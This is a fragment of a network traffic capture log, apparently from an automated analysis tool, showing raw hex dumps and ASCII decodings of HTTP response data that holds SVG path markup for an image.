                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1643INData Raw: 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36
                                                                                                                                                                                                                                                                                                      Data Ascii: .36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1659INData Raw: 32 37 39 2e 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38
                                                                                                                                                                                                                                                                                                      Data Ascii: 279.8a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1675INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 39 2e 38 2c 32 32 36 2e 31 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 0,0,1-.16-2.81"/><path class="cls-4" d="M799.8,226.11a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1691INData Raw: 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2e 32 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505.25,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1707INData Raw: 30 37 2c 39 37 2e 32 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 07,97.27a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1723INData Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1739INData Raw: 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1771INData Raw: 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39
                                                                                                                                                                                                                                                                                                      Data Ascii: -3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.9
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1787INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 35 34 2c 31 37 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 7,0,0,1,.18,3.18"/><path class="cls-7" d="M644.54,178.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1803INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 35 31 2c 32 35 34 2e 32 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36
                                                                                                                                                                                                                                                                                                      Data Ascii: ath class="cls-7" d="M678.51,254.28a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1819INData Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1835INData Raw: 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64
                                                                                                                                                                                                                                                                                                      Data Ascii: -1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1851INData Raw: 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39
                                                                                                                                                                                                                                                                                                      Data Ascii: 2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M765,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1867INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                                      Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1883INData Raw: 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                                                                      Data Ascii: 1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1899INData Raw: 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36
                                                                                                                                                                                                                                                                                                      Data Ascii: 0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.6
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1915INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,
